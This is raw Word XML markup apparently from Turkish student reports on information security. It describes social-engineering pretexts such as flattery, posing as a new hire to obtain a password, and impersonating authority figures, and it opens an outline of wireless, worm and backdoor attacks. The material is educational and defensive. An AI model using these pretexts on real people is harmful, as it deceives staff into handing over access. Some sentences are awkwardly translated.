          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:after="19"/>
        <w:ind w:left="1065" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6345E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Mağdurun egosuna  saldırılar </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E6345E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:after="19"/>
        <w:ind w:left="1065" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6345E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Saldırıları duygular yararlanmak olduğunu sempati veya empati </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E6345E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:after="19"/>
        <w:ind w:left="1065" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6345E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Yıldırıma dayanan saldırılar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E6345E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="138" w:name="_Toc10010062"/>
      <w:r>
        <w:t>8.5</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6345E">
        <w:t>.1. Ego Attacks</w:t>
      </w:r>
      <w:bookmarkEnd w:id="138"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E6345E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="226" w:line="216" w:lineRule="auto"/>
        <w:ind w:right="5"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6345E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>İlk saldırı türünde - ego veya kibir saldırıları - saldırgan en temel insan özelliklerinden bazılarına hitap eder.Herkesin genellikle ne kadar zeki olduğunu duyması onu mutlu eder.Saldırganlarda bunu yapıyor seçtiği kurbanının egosunu tatmin ederek şirket bilgilerini öğrenmeye çalışır ve genellikle öğrenirlerde.Kurban bu kişinin saldırgan olduğunun farkına varmayacaktır bile çünkü egosu tatmin edilir ve o anlık saldırganı çok iyi biri olarak tanır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E6345E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="139" w:name="_Toc10010063"/>
      <w:r>
        <w:t>8.5.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6345E">
        <w:t>2. Sempati Atakları</w:t>
      </w:r>
      <w:bookmarkEnd w:id="139"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="226" w:line="216" w:lineRule="auto"/>
        <w:ind w:right="5" w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6345E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sadırgan genellikle ,yeni işe alınan bir çalışan gibi davranır.İstihbarat aşamasının önemi burada belirginleşir, çünkü saldırganlar, kurbanla , oldukları gibi olduklarına dair bir güven düzeyi oluşturmak zorunda kalacaklardır.Bu, isim bırakarak, uygun jargonu kullanarak veya organizasyon bilgisini göstererek yapar.Saldırgan genellikle işinin acele olduğunu söyleyerek bunu yapmaya çalışır .Mesela bilgi işlemi arayarak yeni işe girdiğini söyler , bilgi toplaması sayesinde elde ettiği kullanıcı adının şifresini ister , bu şifreyi aldığında ise sisteme giriş yapar ve erişim denetimi yetersiz ise sistemde açık aramaya başlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E6345E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="140" w:name="_Toc10010064"/>
      <w:r>
        <w:t>8.5</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6345E">
        <w:t>.3. Sindirme Saldırıları</w:t>
      </w:r>
      <w:bookmarkEnd w:id="140"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="226" w:line="216" w:lineRule="auto"/>
        <w:ind w:right="5" w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6345E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Üçüncü kategoride, saldırganlar otorite figürleri ,organizasyonda etkili bir kişi , kolluk kuvvetleri gibi davranırlar. Saldırganlar, kurban olarak organizasyonda kendini tanıttığı seviyenin altındaki birkaç seviyeyi hedefleyecektir.Saldırgan, parola sıfırlama, hesap değişikliği, sistemlere erişim veya hassas bilgiler için bir tür istekte bulunmak için makul bir neden oluşturur.Saldırganlar, zamanın önemli olduğu ve standart prosedür ne olursa olsun onu atlatmaları gereken senaryoları kullanırlar. Direnişle karşı karşıya kalırsa, saldırganlar mağdurlarını kendilerine yönelik yaptırımları tehdit ederek işbirliğine zorluyorlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E6345E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="141" w:name="_Toc10010065"/>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6345E">
        <w:t>. Riski Azaltma</w:t>
      </w:r>
      <w:bookmarkEnd w:id="141"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004B2433" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="226" w:line="216" w:lineRule="auto"/>
        <w:ind w:right="5"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6345E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sosyal mühendislik saldırısının türü ne olursa olsun, başarı oranı endişe verici derecede yüksek. Sosyal mühendislik saldırılarının riski ve etkisi yüksektir. Bu saldırıların izini sürmek ve bazı durumlarda tespit etmek zordur.Saldırganın meşru bir hesap üzerinden erişim kazanması durumunda, çoğu durumda kontroller ve alarmlar, sistem söz konusu olduğunda yanlış bir şey yapmadıkları için asla etkinleştirilmez.Sosyal mühendislik yapmak bu kadar kolaysa, kuruluşlar kendilerini bu saldırıların risklerine karşı nasıl korurlar? Sosyal mühendislik riskini azaltmak için kuruluşların, personellerini bilgi güvenliği tehditleri ve potansiyel saldırıları nasıl tanıyacakları konusunda etkin bir şekilde eğitmeleri gerekir. Bu saldırıların kontrolü, tartışmayı izleyen eğitim, farkındalık, eğitim ve diğer kontrollerde bulunabilir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6345E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidRPr="00E6345E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Sosyal mühendislik, bilgi güvenliği zincirindeki en zayıf halkaya odakl</w:t>
      </w:r>
      <w:r>
        <w:t>anıyor (insanlar).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w: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Pr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="946" w:line="216" w:lineRule="auto"/>
        <w:ind w:left="5349" w:right="305" w:hanging="3656"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bilgisayar ve Bilgi Güvenliği ve Yönetimi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="786" w:line="216" w:lineRule="auto"/>
        <w:ind w:left="429" w:hanging="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">GÜNCEL HACKER SALDIRILARI VE SAVUNMALARI </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="786" w:line="216" w:lineRule="auto"/>
        <w:ind w:left="429" w:hanging="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Section 1.5.4-1.5.5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="21" w:hanging="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">İHSAN RIDVAN ORAN </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="21" w:right="1" w:hanging="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>130757041</w:t>
      </w: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Pr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="21" w:right="1" w:hanging="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="TBal"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>İçindekiler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="T1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="16254"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
      </w:r>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc10000237" w:history="1">
        <w:r w:rsidRPr="005421E3">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>KABLOSUZ LAN SALDIRILARI</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37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3</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38" w:history="1">
        <w:r w:rsidRPr="005421E3">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>AKTİF VE PASİF İŞLETİM SİSTEMİ SALDIRILARI</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38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0</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39" w:history="1">
        <w:r w:rsidRPr="005421E3">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>SOLUCAN SALDIRILAR</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39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3</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40" w:history="1">
        <w:r w:rsidRPr="005421E3">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>SOLUCAN SALDIRI TÜRLERİ</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40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4</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41" w:history="1">
        <w:r w:rsidRPr="005421E3">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Solucan Savunması</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41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5</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42" w:history="1">
        <w:r w:rsidRPr="005421E3">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>ARKA KAPI SALDIRILARI</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42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6</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43" w:history="1">
        <w:r w:rsidRPr="005421E3">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>ARKA KAPI SALDIRILARI SAVUNMA TEKNİKLERİ</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43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8</w:t>
        </w:r>
        <w:r w:rsidRPr="005421E3">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:webHidden/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="T1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="16254"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc10000244" w:history="1">
        <w:r w:rsidRPr="005421E3">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>OTURUM ÇALMA</w:t>
        </w:r>
        <w:r w:rsidRPr="005421E3">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:webHidden/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="005421E3">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:webHidden/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="005421E3">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:webHidden/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc10000244 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="005421E3">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:webHidden/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="005421E3">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:webHidden/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="005421E3">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:webHidden/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>19</w:t>
        </w:r>
        <w:r w:rsidRPr="005421E3">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:webHidden/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w: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Default="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="21" w:right="1" w:hanging="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="21" w:right="1" w:hanging="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="1162" w:line="216" w:lineRule="auto"/>
        <w:ind w:left="355"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Bu bölümde son zamanlarda gerçekleştirilen bazı siber saldırıları ve bu saldırılara karşı alınabilecek bazı önlemleri inceleyeceğiz.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0" w:line="216" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="2321" w:hanging="360"/>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İnceleyeceğimiz saldırı tipleri kablosus LAN saldırıları,aktif ve pasif işletim sistemi saldırıları,solucan saldırılar,arka plan saldırıları.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="142" w:name="_Toc10000237"/>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>KABLOSUZ LAN SALDIRILARI</w:t>
      </w:r>
      <w:bookmarkEnd w:id="142"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="199" w:line="225" w:lineRule="auto"/>
        <w:ind w:left="-1" w:right="-11" w:hanging="10"/>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Wi-Fi olarakda bilinen IEEE 802.11b protokolünü temel alan teknoloji kullanılarak kablosuz LAN’lar geliştirildi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="183" w:line="216" w:lineRule="auto"/>
        <w:ind w:left="35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Bu kablosuz LAN lar kullanılabilirlik ve üretkenlik perspektifinden muhteşem faydalar sunar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="183" w:line="216" w:lineRule="auto"/>
        <w:ind w:left="35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Ancak bu kablosuz ağlar bir sisteme ulaşmanın en kolay yoludur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="183" w:line="216" w:lineRule="auto"/>
        <w:ind w:left="35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Saldırganlar kuruluşların kablosuz ağlarına erişebilmenin kolay yollarını aramak için sokaklara çıkarlar.Eğer ağa 100 metre kadar yaklaşırsa varlığını tespit edebilirler.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="183" w:line="216" w:lineRule="auto"/>
        <w:ind w:left="35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Ağ gerekli şekilde korunmuyorsa  erişim gerçekleştirebilirler.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="183" w:line="216" w:lineRule="auto"/>
        <w:ind w:left="-1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Bu olaya AĞ TÖKEZLEMESİ adı da verilir.</w:t>
      </w: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t>LAN saldırılarını önlemek için çok sayıda hazır yazılım bulunmaktadır.</w:t>
      </w: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t>Bunların en popüleri kullanımı kolay bir GUI tabanlı NetStumbler ‘dır.</w:t>
      </w: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t xml:space="preserve">Bu saldırılar önlemek için SSID lerin karmaşık olması bir çözüm değildir.Bunun </w:t>
      </w:r>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>yanı sıra SSID nin yayın isteklerine yanıt vermeyeceği şekilde tasarlanmış olsa bile SSID ler açık metin olarak gönderilip ele geçirilebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
